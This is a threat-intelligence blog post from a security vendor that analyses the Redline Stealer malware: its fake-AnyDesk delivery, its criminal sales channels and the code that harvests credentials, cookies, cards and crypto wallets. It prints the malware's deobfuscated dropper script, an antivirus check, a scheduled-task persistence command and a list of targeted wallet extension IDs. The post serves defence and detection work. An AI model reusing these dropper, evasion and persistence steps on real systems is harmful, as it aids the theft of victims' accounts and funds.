Blog

eSentire Threat Intelligence Malware Analysis: Redline Stealer

BY eSentire Threat Response Unit (TRU)

December 8, 2022 | 18 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin

Want to learn more on how to achieve Cyber Resilience?

TALK TO AN EXPERT

IN THIS POST

Redline Stealer is one of the most popular stealers being sold and used by cybercriminals. The command and control (C2) panel does not require an attacker to log in via the Web UI; everything can be managed via the Redline client on the attacker’s virtual private server (VPS). The functionality of the stealer contains multiple capabilities including obfuscation, which makes it easy for attacker(s) to manage.

This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.

Key Takeaways

  • Redline Stealer is mostly being distributed via fake software. Attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer.
  • Attacker(s) use an AutoIt wrapper and various crypting services to obfuscate the stealer binary.
  • Redline comes with loader tasks that allow an attacker to perform various actions on the infected host including file download, process injection and command execution.
  • Redline uses Windows Communication Foundation (WCF) with NetTCPBinding for C2 communication.
  • Redline Stealer does not exfiltrate logs from Commonwealth of Independent States (CIS) countries.

Case Study

eSentire’s Threat Response Unit (TRU) has observed Redline Stealer being distributed via fake software, AnyDesk. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).

Figure 1: Fake AnyDesk webpage


Figure 2: Legitimate AnyDesk webpage


The fake AnyDesk installer comes in an ISO image file and is 312MB in size. This is a common practice for stealers to pad the binary with junk hex bytes to increase the file size since some sandboxes and antiviruses have file size limitations. The infection chain is shown in Figure 3.

Figure 3: Redline infection chain via fake software


The AnyDesk binary contains the cabinet file within RCData (Figure 4). The extracted cabinet file contains the following:

Figure 4: Contents of the cabinet file


Figure 5: Cabinet file embedded within the binary


The AnyDesk binary contains the section POSTRUNPROGRAM with the command cmd /c cmd < Saputo.potm & ping -n 5 localhost. The command executes the obfuscated Saputo.potm file and then pings the localhost five times, which is intended for the malware to sleep for 5 seconds so the obfuscated file can successfully run.

The deobfuscated Saputo.potm file is shown below:

tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL
if not errorlevel 1 Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe
<nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS
MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS
ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t
pEoQCZpLBzfzlhEvxHCjS t
ping localhost -n 5

The script looks for PSUAService.exe on the infected system, which is a part of Panda Cloud Antivirus Software. If the mentioned antivirus is not present on the system, the malware will execute the main payload with the renamed AutoIt tool.

imagine.potm contains the obfuscated AutoIt script where Redline stealer resides. The embedded Redline binary contains within the obfuscated AutoIt script is shown in Figure 6.

Figure 6: Embedded Redline stealer within an obfuscated AutoIt script


The RC4 key to decode the script is concatenated with decimal values and subtracted by 2 as shown below (snipped of the obfuscated AutoIt script):

$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)

The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.

After the execution of the binary, the files mentioned in Figure 4 will be extracted from the CAB file into IXPxxx.TMP folder under the %TEMP% path as shown in Figure 7. The renamed NTDLL.DLL file is also dropped to the folder. This is a known technique used by threat actor(s) to bypass EDR detections – loading the copy of NTDLL.DLL during the runtime. We have briefly described this technique in our Mars Stealer analysis.

Figure 7: Debugging AnyDesk.exe file


An additional folder is created to run a scheduled task from, this is the persistence technique to make sure that the infected host periodically communicates with the C2.

The scheduled task creation command line (the scheduled task is named Puoi and is set to run the z file under folder %TEMP%\zqNDtAgMrV, which is the obfuscated AutoIt script containing the stealer, every 3 minutes):

schtasks.exe /create /tn "Puoi" /tr "C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\PJDKIgRDMm.exe.com C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\z" /sc minute /mo 3 /F

The deobfuscated binary contains Redline Stealer that is injected into jsc.exe process after being decrypted by a rename AutoIt process as shown in Figure 7.

Figure 8: The stealer is injected into jsc.exe


The extracted .NET Redline payload is approximately 619KB in size (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b), the original filename is Test.exe, and the compilation timestamp is July 24, 2022. Upon opening the file in a debugger, we can see that the stealer performs enumeration on the victim’s machine looking for installed browsers, FTP connections, security tools, software, crypto wallets (Figure 9).

Figure 9: Redline performs enumeration on the host


We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).

Figure 10: Redline collecting credit card information from Chrome

Redline Stealer Behind The Scenes

Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline is allegedly written based on feedback from people involved in carding, the term describing an unauthorized usage of credit cards.

Similar to Raccoon Stealer, Redline requires a VPS (Virtual Private Server) dedicated server to host the panel. The stealer can be easily bought via a Telegram Bot (Figure 12) using cryptocurrency as a payment method. The price for Redline is $150USD per month and $900USD for lifetime access. Upon purchasing Redline, the user gets a link to the private chat in Telegram. At the time of this analysis, roughly 400 members were part of the telegram group. Based on a review of the chats, Russian native speakers were the most active. After the subscription expires, the user is removed from the private chat.

Figure 11: First appearance of Redline Stealer on hacking forums (translated from Russian)


Figure 12: Redline Telegram Bot

Redline Stealer capabilities include:

What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).

Figure 13: Redline installation manual


It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.

The Redline panel (Figure 14) is easy to navigate through and contains the following sections:

Figure 14: Redline Statistic Panel (source: Telegram)


Figure15: Advertisement panel


Figure 16: Loader Tasks panel


Figure 17: Log Sorter panel


Figure 18 : Builder panel


Figure 19: Telegram Logs Configurator


Figure 20: Black Lists panel


Figure 21: Settings panel


Facebook logs are one of the popular stolen logs being bought on hacking forums (Figures 22-23). The stealer logs that contain cookies can be enticing to cybercriminals. With the cookies, an attacker would be able to bypass two-factor authentication. By using the stolen cookie, the threat actor would be able to authenticate as another user on platforms such as YouTube and Facebook.

Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the user’s knowledge. Spend logs are the accounts where an attacker can spend a certain amount of money to publish their ads per day (Figure 22).

Figure 22: Advertisement on buying Facebook logs


Figure 23: Facebook logs buy requests on hacking forums


There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).

Figure 24: Telegram Bot that buys the stolen logs (currency is shown in rubles)


Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).

Figure 25: Redline logs for sale on RussianMarket


It is worth noting that Redline is being distributed not only via cracked or fake software. Other means to distribute Redline are via installers and YouTube traffic (Figure 26). With YouTube traffic, an attacker would create or purchase the channel and upload a short video with the description to lure the user to install the application via the direct link.

Figure 26: The guide written by a Russian native speaker on how to distribute stealers (translated from Russian)


The installers push the stealer to third-party advertising networks or platforms. The advertising service will display the ads on different webpages based on the countries that the attacker(s) specifies. (Figure 27).

Figure 27: The Bot that push the stealers via advertising platforms

More seasoned cybercriminals usually crypt or obfuscate the payload through the well-known crypters in the hacking channels named Mastif and 11. Redline also advertises one of crypters named Spectrcrypt or Spectrum Crypt which comes for free with a one-month subscription purchase (Figure 28).

Figure 28: Spectrum Crypt promoted by Redline


The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).

Figure 29: Redline logs for sale (1)


Figure 30: Redline logs for sale (2)

Redline Technical Analysis

The non-obfuscated Redline payload is a 32-bit .NET binary with 107 KB in size. The hash of the payload and original filename changes each time the build/payload is generated from the Redline panel.

The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).

Figure 31: Redline payload cconfiguration


The encoded strings are base64-encoded and XOR-ed with the hardcoded key “Raves” then base64-encoded again (Figure 32).

Figure 32: String encoding algorithm with simple XOR key and base64


Under Entity16, the stealer enumerates the Login Data, Web Data, Cookies folders for Chrome and Opera GX Stable. It also searches for crypto wallet browser extensions under Local Extension Settings folders for Chrome (Figure 33).

The crypto wallet extensions decoded from Base64-encoded blob:

ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet
nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase
fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet
blnieiiffboillknjnepogjhkgnoapac|EqualWallet cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet
kncchdigobghenbbaddojjnnaogfppfj|iWallet amkmjjmmflddogmhpjloimipbofnfjih|Wombat fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet
nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet
fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet
aeachknmefphepccionboohckonoeemg|Coin98Wallet cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain
bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom fhilaheimglignddkjgofkcbgekhenbh|Oxygen mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet
aodkkagnadcbobfpggfnjeongemjbjca|BoltX kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet
lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet
ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask
afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain
odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet blnieiiffboillknjnepogjhkgnoapac|EqualWallet
cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet kncchdigobghenbbaddojjnnaogfppfj|iWallet
amkmjjmmflddogmhpjloimipbofnfjih|Wombat fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx
nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet
aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet aeachknmefphepccionboohckonoeemg|Coin98Wallet
cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom
fhilaheimglignddkjgofkcbgekhenbh|Oxygen mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet aodkkagnadcbobfpggfnjeongemjbjca|BoltX
kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet
dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet bhghoamapcdpbohphigoooaddinpkbai|Authenticator ookjlbkiijinhpmnjffcofjonbfbgaoc|TempleWallet

Figure 33: Browser folders and crypto wallet extension enumeration


Entity15 is likely used for performing the loader tasks (Figure 34).

Figure 34: Updating the loader tasks


The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).

Figure 35: ConfigReader class


ConnectionProvider class contains the C2 communication method used in Redline. Communication with the C2 server is established via Windows Communication Foundation (WCF) with NetTCPBinding. The WCF TCP transport utilizes the net.tcp:// protocol. The destination port is specified by an attacker (Figure 36).

Figure 36: C2 communication via WCF


The example of C2 traffic generated by the workstation infected with Redline containing the stealer configuration, C2 IP, host information and files residing on the host (Figure 37); tempuri[.]org is the default WCF namespace and should not be considered as the only indicator of Redline compromise.

Figure 37: Example of the traffic generated from the infected machine


Entity5 gathers Discord tokens under \AppData\Roaming\discord\Local Storage\leveldb path from .log and .db files (Figure 38). Redline harvests the Discord tokens because they can bypass Two Factor Authentication (2FA) and allow users to access their accounts without providing credentials. All that is needed is the link. For detection evasion purposes, Redline adds random words into the strings and then replaces them.

Figure 38: Discord token stealer module


Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).

Figure 39: DownloadAndEx and Download loader tasks


Entity8, 10, 11 and 12 within EntityCreator class scans for autofills, cookies, credentials, and credit cards accordingly (Figure 40). The credentials will be then decrypted in the EntityReader class.

Figure 40: Cookie, credit card, credential, and autofill scanner module


Previously, we mentioned that Redline stealer does not exfiltrate logs from CIS countries. The stealer checks for the local time zone of the infected machine and the default user interface language for the presence of languages used by CIS countries (Figure 41).

Figure 41: Default user interface language


PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).

Figure 42: PartsSender class containing each log that needs to be sent to an attacker


The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).

Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).

Figure 43: SystemInfoHelper class


Figure 44: Logs received from the compromised machine


Figure 45: Redline User Information logs

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:

While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

eSentire Unit
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Read the Latest from eSentire